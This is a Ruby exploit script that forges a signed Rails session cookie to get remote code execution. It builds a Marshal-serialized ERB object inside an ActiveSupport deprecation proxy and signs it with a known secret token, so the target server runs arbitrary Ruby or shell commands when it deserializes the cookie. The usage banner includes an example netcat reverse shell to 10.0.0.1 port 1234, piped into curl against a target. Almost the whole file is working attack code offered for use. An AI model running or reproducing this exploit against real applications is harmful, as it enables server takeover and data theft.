rails_cookie_rce.rb

#!/usr/bin/env ruby

require "base64"
require "erb"
require "openssl"
require "optparse"

class ActiveSupport
  class Deprecation
    class DeprecatedInstanceVariableProxy
      def initialize(instance, method)
        @instance = instance
        @method = method
      end
    end
  end
end

msg = "(value, name of file containing value, or '-' to read value from STDIN)"
def get_content spec # use stdin if spec '-', content of spec file, or spec itself as content
  spec ? ( spec.strip == '-' ? STDIN.read : ( File.exists?(spec) ? File.open(spec,'r').read : spec ) ).strip : nil
end

opts = {}
op = OptionParser.new
op.banner = "usage: #{$0} [opts]\nexample: #{$0} -s mysecret -c 'nc -e /bin/sh 10.0.0.1 1234' -b _myapp_session | xargs curl -v myapp.com -b 2>&1 | egrep 'Cookie:|HTTP/'"
op.on("-s", "--secret SECRET", "Rails secret token #{msg}")  do |s| opts[:secret] = get_content s end
op.on("-e", "--code CODE", "Ruby code to execute #{msg}") do |e| opts[:code] = get_content e end
op.on("-c", "--command COMMAND", "Shell command to execute #{msg}") do |c| opts[:command] = get_content c end
op.on("-b", "--cookie NAME", "Name of cookie to prepend to cookie value #{msg}") do |b| get_content opts[:cookie] = b end
op.parse!

if opts[:code] && opts[:command] || !opts[:code] && !opts[:command] || !opts[:secret] then
  $stderr.puts "ERROR: must specify secret (-s) and either ruby code (-e) or shell command (-c) "
  puts op
  exit
end

code = opts[:code] || "`#{opts[:command]}`"
secret = opts[:secret]

# create payload
erb = ERB.allocate
erb.instance_variable_set :@src, code
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
hash = {depr => 'something'} # make stringify_keys! happy
marshalled = Marshal.dump(hash)
payload = Base64.encode64(marshalled).gsub("\n", "")
sig = OpenSSL::HMAC.hexdigest('sha1', secret, payload)
cookie = "#{payload}--#{sig}"

puts (opts[:cookie] ? "#{opts[:cookie]}=" : '') + cookie